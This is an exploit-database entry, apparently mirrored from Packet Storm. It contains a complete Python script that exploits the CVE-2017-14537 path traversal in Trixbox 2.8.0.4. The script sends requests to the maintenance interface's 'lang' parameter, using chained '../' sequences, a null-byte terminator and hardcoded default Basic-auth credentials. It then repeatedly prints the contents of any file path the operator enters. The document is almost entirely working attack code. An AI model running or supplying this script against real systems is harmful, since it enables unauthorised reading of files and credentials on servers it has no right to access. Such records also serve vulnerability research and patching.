Exploit for Trixbox 2.8.0.4 Path Traversal CVE-2017-14537

Name: Exploit for Trixbox 2.8.0.4 Path Traversal CVE-2017-14537
Rating: 5 (105 reviews)
2021-05-28 | CVSS 4.0
## https://sploitus.com/exploit?id=PACKETSTORM:162853
# Exploit Title: Trixbox 2.8.0.4 - 'lang' Path Traversal  
# Date: 27.05.2021  
# Exploit Author: Ron Jost (Hacker5preme)  
# Credits to: https://secur1tyadvisory.wordpress.com/2018/02/13/trixbox-multiple-path-traversal-vulnerabilities-cve-2017-14537/  
# Credits to: Sachin Wagh  
# Vendor Homepage: https://sourceforge.net/projects/asteriskathome/  
# Software Link: https://sourceforge.net/projects/asteriskathome/files/trixbox%20CE/trixbox%202.8/trixbox-2.8.0.4.iso/download  
# Version: 2.8.0.4  
# Tested on: Xubuntu 20.04  
# CVE: CVE-2017-14537  
  
'''  
Description:  
trixbox 2.8.0.4 has path traversal via the xajaxargs array parameter to /maint/index.php?packages or the  
lang parameter to /maint/modules/home/index.php.  
'''  
  
  
'''  
Import required modules:  
'''  
import requests  
import sys  
import urllib.parse  
  
  
'''  
User-Input:  
'''  
target_ip = sys.argv[1]  
target_port = sys.argv[2]  
  
  
'''  
Construct malicious request:  
'''  
# Constructing header:  
header = {  
'Host': target_ip,  
'User-Agent': 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0',  
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',  
'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',  
'Accept-Encoding': 'gzip, deflate',  
'Connection': 'keep-alive',  
'Cookie': 'template=classic; lng=en; lng=en',  
'Upgrade-Insecure-Requests': '1',  
'Authorization': 'Basic bWFpbnQ6cGFzc3dvcmQ=',  
}  
  
# Constructing malicious link (payload):  
base_link = 'http://' + target_ip + ':' + target_port  
base_link_addon_1 = '/maint/modules/home/index.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..'  
base_link_addon_3 = '%00english'  
print('')  
base_link_addon_2 = input('Input the filepath or input EXIT: ')  
  
  
  
'''  
EXPLOIT:  
'''  
while base_link_addon_2 != 'EXIT':  
base_link_addon_2_coded = urllib.parse.quote(base_link_addon_2, safe='')  
exploit_link = base_link + base_link_addon_1 + base_link_addon_2_coded + base_link_addon_3  
print('')  
exploit = requests.post(exploit_link, headers=header)  
print('Contents of ' + base_link_addon_2 + ':')  
for data in exploit.iter_lines():  
data = data.decode('utf-8')  
if data != '<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">':  
print(data)  
else:  
break  
print('')  
base_link_addon_2 = input('Input the filepath or input EXIT: ')